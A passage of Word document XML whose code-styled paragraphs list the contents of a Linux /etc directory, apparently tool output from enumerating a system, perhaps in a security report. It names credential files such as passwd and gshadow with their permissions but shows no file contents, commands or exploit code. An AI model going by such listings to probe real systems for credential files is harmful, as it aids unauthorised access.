    <w:p w14:paraId="7BFB974B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw------- root  root    1012   group-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE80C28" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   grub.d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A275ABC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r----- root  shadow  849    gshadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D0B00B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw------- root  root    834    gshadow-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFE765A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   gtk-2.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0F4B2A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   gtk-3.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C35675" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   gtkmathview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D8BC4A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    6748   hddtemp.db</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBC5168" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    4781   hdparm.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8BB330" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    92     host.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6665F8F3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    12     hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710C6B2D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    993    hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04788294" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    411    hosts.allow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E362A87" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    711    hosts.deny</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0A50D1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   hp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CB183F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   ifplugd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6E1D2D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   init</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E621D97" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   init.d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05160652" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   initramfs-tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FD30CF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    1721   inputrc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644657CE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   insserv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A3552C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    771    insserv.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0762F0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   insserv.conf.d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586B3EAB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   iproute2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255009C7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   iscsi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A93E11A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    26     issue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662F52B2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    19     issue.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408475F8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   kbd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AE75E0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   kernel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23ECD07E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    144    kernel-img.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F073B81" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    1311   kerneloops.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63829383" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   landscape</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2361E5A7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    100131 ld.so.cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB40211" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    34     ld.so.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC05489" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   ld.so.conf.d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56781077" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   ldap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571C9971" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    267    legal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3779AF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    191    libaudit.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E443586" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   libnl-3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C60E66" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   libpaper.d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E234C26" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   lightdm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2D39A0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    1291   lintianrc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710897A6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    2570   locale.alias</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AEA40D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    3519   localtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D88487" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   logcheck</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346107FC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    10551  login.defs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097C1954" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    703    logrotate.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E469A1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   logrotate.d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB53594" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    105    lsb-release</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD564C7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    14867  ltrace.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2488036E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   lvm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F86456" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    111    magic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242DF4C3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    111    magic.mime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12139530" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   mail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144F1CB2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    28391  mailcap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0C8C5E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    449    mailcap.order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E71B25E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    5173   manpath.config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD466D0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   mercurial</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017908EA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    23922  mime.types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B57BA33" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    956    mke2fs.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8EEB0E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   modprobe.d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DC43B9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    255    modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351F0B47" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   modules-load.d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030076CB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    979    mtab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D9EE9C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw------- root  lightdm 0      mtab.fuselock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA3BE9A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   mysql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D3E1F4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    8453   nanorc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59901678" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BAE8B7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    91     networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287E7645" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   newt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168BFAFA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    507    nsswitch.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13280E5B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- ntp   ntp     205    ntp.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BB821E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   obex-data-server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7B7031" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   opt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108C09F5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    249    os-release</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6766B3AC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    552    pam.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A07CC1C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   pam.d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482E4D53" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    3      papersize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33594C5C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    2353   passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D32BC9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw------- root  root    2353   passwd-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574360A3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   pcmcia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDF23E8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   perl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61715B30" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   pki</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C42D75" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   pm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0510C65C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    7649   pnm2ppa.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F967DA1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   polkit-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5E6AE4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    350    popularity-contest.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7037B21F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   ppp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B954DC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    665    profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F950AB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   profile.d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5298744E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    2932   protocols</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB2B96A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
